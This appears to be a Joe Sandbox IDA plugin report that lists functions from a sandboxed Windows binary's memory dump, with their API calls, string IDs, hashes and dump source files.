                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2706829360-0
                                                                                                                                                                                                                                  • Opcode ID: 9d14002a6f440e1a1670a610c335e02f820f6ffe5901bd270243d0e37f27b646
                                                                                                                                                                                                                                  • Instruction ID: 24f4510e806e3ce8321c8f423b79c12e1f2a24b9af7c8526503f321fb2c4b15c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d14002a6f440e1a1670a610c335e02f820f6ffe5901bd270243d0e37f27b646
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 21414375A0021DDFCF10EFA8D8449BD7BB9FF88344F008465EA55A7262D774A946CF90
                                                                                                                                                                                                                                  Function 00A19730 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _wcslen$BuffCharLower
                                                                                                                                                                                                                                  • String ID: cdecl$none$stdcall$winapi
                                                                                                                                                                                                                                  • API String ID: 707087890-567219261
                                                                                                                                                                                                                                  • Opcode ID: 7572ec23230069cfcd4d3e0710f2d74ed175328b6cbf7183e8d82a869fb8b489
                                                                                                                                                                                                                                  • Instruction ID: 7c2040f3d33558adb5a8f0dc0847faf1322158abc1ddbf2e1c67aad378f8ebe5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7572ec23230069cfcd4d3e0710f2d74ed175328b6cbf7183e8d82a869fb8b489
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9751C032A001169BCF14DFACC9619FFB7A5BF65360B204229E866E72D1DB35DE81C790
                                                                                                                                                                                                                                  Function 00A14189 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 187comCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CoInitialize.OLE32 ref: 00A141D1
                                                                                                                                                                                                                                  • CoUninitialize.OLE32 ref: 00A141DC
                                                                                                                                                                                                                                  • CoCreateInstance.OLE32(?,00000000,00000017,00A30B44,?), ref: 00A14236
                                                                                                                                                                                                                                  • IIDFromString.OLE32(?,?), ref: 00A142A9
                                                                                                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00A14341
                                                                                                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00A14393
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                                                                                                                                                                                  • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                                                                                                                  • API String ID: 636576611-1287834457
                                                                                                                                                                                                                                  • Opcode ID: 2105c8c1ef64481c379d103be8478adef740fcdb7287d8f49f9c9b2da73a3d67
                                                                                                                                                                                                                                  • Instruction ID: a031b232dbff316b73faa255cc12ba66a0950ddccaf42ffcc7b27dc577dceb1d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2105c8c1ef64481c379d103be8478adef740fcdb7287d8f49f9c9b2da73a3d67
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3E619271608701AFD310DFA8C889BEEBBE4EF89714F100919F9959B291D770ED85CB92
                                                                                                                                                                                                                                  Function 00A08BDA Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00A08C9C
                                                                                                                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00A08CAC
                                                                                                                                                                                                                                  • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00A08CB8
                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A08D55
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A08D69
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A08D9B
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A08DD1
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A08DDA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentDirectoryTime$File$Local$System
                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                  • API String ID: 1464919966-438819550
                                                                                                                                                                                                                                  • Opcode ID: 5612a85b02b5ec6c4bbbd72dc4320a2b4f31beb6bababf50d37ec4430f21a1b8
                                                                                                                                                                                                                                  • Instruction ID: 6e1314bd782a638343bccccd8bbdfdbebf3c079804ad67970d7aacc283f352c5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5612a85b02b5ec6c4bbbd72dc4320a2b4f31beb6bababf50d37ec4430f21a1b8
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8B616CB25043099FDB10EF64D844AAEB3E8FF99310F04492EF989C7291DB35E945CB96
                                                                                                                                                                                                                                  Function 00A246E2 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 101windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateMenu.USER32 ref: 00A24715
                                                                                                                                                                                                                                  • SetMenu.USER32(?,00000000), ref: 00A24724
                                                                                                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00A247AC
                                                                                                                                                                                                                                  • IsMenu.USER32(?), ref: 00A247C0
                                                                                                                                                                                                                                  • CreatePopupMenu.USER32 ref: 00A247CA
                                                                                                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00A247F7
                                                                                                                                                                                                                                  • DrawMenuBar.USER32 ref: 00A247FF
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                                                                                                                                                                                  • String ID: 0$F
                                                                                                                                                                                                                                  • API String ID: 161812096-3044882817
                                                                                                                                                                                                                                  • Opcode ID: 5de44a9511e63cc48eb92588ded85ff3ed2f1c10f9d06bf5dd95f54a05611c00
                                                                                                                                                                                                                                  • Instruction ID: 728e77b386f62fd8120701b49f65cc0bbcba2921833595738b3aa58c54cffc2e
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5de44a9511e63cc48eb92588ded85ff3ed2f1c10f9d06bf5dd95f54a05611c00
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A8417A75A11219EFDB24CFA8E884FAA7BB5FF49314F144028FA46A7351D7B0A912CF50
                                                                                                                                                                                                                                  Function 009F282C Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 78windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                    • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 009F28B1
                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 009F28BC
                                                                                                                                                                                                                                  • GetParent.USER32 ref: 009F28D8
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 009F28DB
                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 009F28E4
                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 009F28F8
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 009F28FB
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                  • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                  • Opcode ID: d5ae8ea9e9ffb8e797468f7bfe6ebed0c5980932d32afa4afca7261fda33f56b
                                                                                                                                                                                                                                  • Instruction ID: 8f452f34e2ed41016d8c835f9988500c695bcb96b2624748df3ac661bb07f3e8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d5ae8ea9e9ffb8e797468f7bfe6ebed0c5980932d32afa4afca7261fda33f56b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E421C274900118BBCF10EBA4DC85EFEBBB8EF45350F004526BA51A3291DB79480ADB60
                                                                                                                                                                                                                                  Function 009F290D Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 77windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0099B329: _wcslen.LIBCMT ref: 0099B333
                                                                                                                                                                                                                                    • Part of subcall function 009F45FD: GetClassNameW.USER32(?,?,000000FF), ref: 009F4620
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00000186,00020000,00000000), ref: 009F2990
                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32 ref: 009F299B
                                                                                                                                                                                                                                  • GetParent.USER32 ref: 009F29B7
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 009F29BA
                                                                                                                                                                                                                                  • GetDlgCtrlID.USER32(?), ref: 009F29C3
                                                                                                                                                                                                                                  • GetParent.USER32(?), ref: 009F29D7
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,00000111,?), ref: 009F29DA
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                                                                                                                                                                                  • String ID: ComboBox$ListBox
                                                                                                                                                                                                                                  • API String ID: 711023334-1403004172
                                                                                                                                                                                                                                  • Opcode ID: 8db2aa7917c66c1302b8f8a0e3bbbdbb69154215e331d76f447b3f786185e827
                                                                                                                                                                                                                                  • Instruction ID: 7456402f7f9575650cc6b8571cdfd34067f5c241257bb4f49b4d36fc816a9956
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8db2aa7917c66c1302b8f8a0e3bbbdbb69154215e331d76f447b3f786185e827
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA21F375D00218BBCF10EBA8DC85FFEBBB8EF04350F104416BA51A7192CB79494ADB60
                                                                                                                                                                                                                                  Function 00A244BF Relevance: 15.2, APIs: 10, Instructions: 182windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00A24539
                                                                                                                                                                                                                                  • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00A2453C
                                                                                                                                                                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00A24563
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00A24586
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00A245FE
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00A24648
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00A24663
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00A2467E
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00A24692
                                                                                                                                                                                                                                  • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00A246AF
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: MessageSend$LongWindow
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 312131281-0
                                                                                                                                                                                                                                  • Opcode ID: a29d0525deac4a660b40c3168d0586f6255f3b3af1ed70f420ddf168ae63958e
                                                                                                                                                                                                                                  • Instruction ID: f245a39f5595b836611bf4da5a48bf087f935a83a320e87e5b37f565a45c1eb8
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a29d0525deac4a660b40c3168d0586f6255f3b3af1ed70f420ddf168ae63958e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AA618B75A00218AFDB20DFA8DD81FEE77B8EF49710F100169FA14E72A1C7B4A956DB50
                                                                                                                                                                                                                                  Function 009FBAF6 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 009FBB18
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(00000000,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBB2C
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000), ref: 009FBB33
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBB42
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 009FBB54
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBB6D
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBB7F
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBBC4
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBBD9
                                                                                                                                                                                                                                  • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,009FABA8,?,00000001), ref: 009FBBE4
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2156557900-0
                                                                                                                                                                                                                                  • Opcode ID: ce124ba82253e6607ad912afbebf2dc246357f2e238e5a48b9a0e7e1906391ae
                                                                                                                                                                                                                                  • Instruction ID: b8cbdd738a1cf6321e4034ad054392006750301f49700d0b68c8c5b66841539f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ce124ba82253e6607ad912afbebf2dc246357f2e238e5a48b9a0e7e1906391ae
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 60316D72904218BFDB20DFA8DC98F7A77BDAB49353F114025FB05D71A4D7B899428B60
                                                                                                                                                                                                                                  Function 009C2FF3 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3007
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4), ref: 009C2D4E
                                                                                                                                                                                                                                    • Part of subcall function 009C2D38: GetLastError.KERNEL32(00A61DC4,?,009CDB51,00A61DC4,00000000,00A61DC4,00000000,?,009CDB78,00A61DC4,00000007,00A61DC4,?,009CDF75,00A61DC4,00A61DC4), ref: 009C2D60
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3013
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C301E
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3029
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3034
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C303F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C304A
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3055
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C3060
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 009C306E
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 3281ed4e5039e461c317472638702b8588b67961fafd0c263f449731459f7a7b
                                                                                                                                                                                                                                  • Instruction ID: 2f03ddb7331d664d09410379322350697880070fd0a232fba09ecd22bf390d0a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3281ed4e5039e461c317472638702b8588b67961fafd0c263f449731459f7a7b
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3C11CB76900108BFCB01EF54C842FDD3B75EF59350B9144A9F9099F172D631DE919B91
                                                                                                                                                                                                                                  Function 00A08835 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00A089F2
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A08A06
                                                                                                                                                                                                                                  • GetFileAttributesW.KERNEL32(?), ref: 00A08A30
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000000), ref: 00A08A4A
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A08A5C
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 00A08AA5
                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00A08AF5
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000A.00000002.1944338699.0000000000991000.00000020.00000001.01000000.00000005.sdmp, Offset: 00990000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944319545.0000000000990000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A2D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944388813.0000000000A53000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944574835.0000000000A5D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000A.00000002.1944591414.0000000000A65000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_990000_End.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: CurrentDirectory$AttributesFile
                                                                                                                                                                                                                                  • String ID: *.*
                                                                                                                                                                                                                                  • API String ID: 769691225-438819550
                                                                                                                                                                                                                                  • Opcode ID: 3681c9e3eafcaeaa6c74b293c3617f18ba7b08f9998bf3bc5843f03fa9488b5f
                                                                                                                                                                                                                                  • Instruction ID: af7562c9ff518442109d0aafb20df71c2a54d9d9d4397499af9d9ff4b3eed92a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3681c9e3eafcaeaa6c74b293c3617f18ba7b08f9998bf3bc5843f03fa9488b5f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AF81AF729043089BCB24EF58D844ABAB3E8BF94390F54482EF8C5D7291DF39D9458B96
                                                                                                                                                                                                                                  Function 00997447 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • SetWindowLongW.USER32(?,000000EB), ref: 009974D7
                                                                                                                                                                                                                                    • Part of subcall function 00997567: GetClientRect.USER32(?,?), ref: 0099758D
